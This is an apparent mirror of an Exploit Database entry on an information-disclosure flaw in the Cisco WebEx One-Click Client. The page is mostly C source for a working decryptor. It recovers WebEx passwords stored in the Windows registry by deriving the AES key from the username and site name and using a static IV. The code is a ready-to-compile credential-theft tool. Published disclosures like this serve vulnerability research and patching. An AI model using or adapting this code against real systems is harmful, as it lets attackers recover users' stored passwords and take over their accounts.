Cisco WebEx One-Click Client Password Encryption – Information Disclosure

• Exploit Database
• 113 阅读

• 作者： Brad Antoniewicz
  日期： 2013-07-09
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38668/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119

  // source: https://www.securityfocus.com/bid/61304/info   Cisco WebEx One-Click Client is prone to an information disclosure vulnerability.   Successful exploits may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks.   /* WebEx One-Click Registry Key Decryptor brad.antoniewicz@foundstone.coma   compile with gcc -o webex-onedecrypt -lssl webex-onedecrypt.c   Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography for making life easy   see comments below   */   #include <openssl/aes.h> #include <string.h> #include <stdlib.h> #include <stdio.h>   unsigned char * aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv) { unsigned char * outbuf = calloc(1,length); int num = 0;   unsigned char liv[16];   memcpy(liv,iv,16);   AES_KEY aeskey;   //memset(outbuf, 0, 8);   AES_set_encrypt_key(key, 256, &aeskey);   AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num);   return outbuf; }   unsigned char * aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv) { unsigned char * outbuf= calloc(1,length); int num = 0;   unsigned char liv[16];   memcpy(liv,iv,16);   AES_KEY aeskey;     AES_set_encrypt_key(key, 256, &aeskey);   AES_ofb128_encrypt(enc, outbuf, length, &aeskey, liv, &num);   return outbuf; } void main() { /* This value is from HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password */ unsigned char * regVal = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f"; /* This value is from HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen */ int regLength = 12;   /* This value is a combination of these two registry keys: HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName   Basicaly the username and the sitename padding to 32 characters, if the two dont add up to 32 characters, its just repeated until it fits */ unsigned char key[32] = "braantonsiteaa.webex.com/siteaab";   /* The IV is static, particularly complex value of 123456789abcdef.... */ unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };   /* These are just for testing, you&apos;d probably not have the password :) */ unsigned char * password = "bradbradbrad"; int pwLength = strlen((char *)password);   unsigned char * enc = NULL; unsigned char * enc2 = NULL; int i = 0;     printf("Reg Key Value = "); enc = aes_ofb_encrypt(password, pwLength, key, iv); for(i=0;i<pwLength;i++) { printf("%02x ", enc[i]); } printf("\n");   printf("Password = "); enc2 = aes_ofb_decrypt(regVal, regLength, key, iv); for(i=0;i<regLength;i++) { printf("%c", enc2[i]); } printf("\n");   }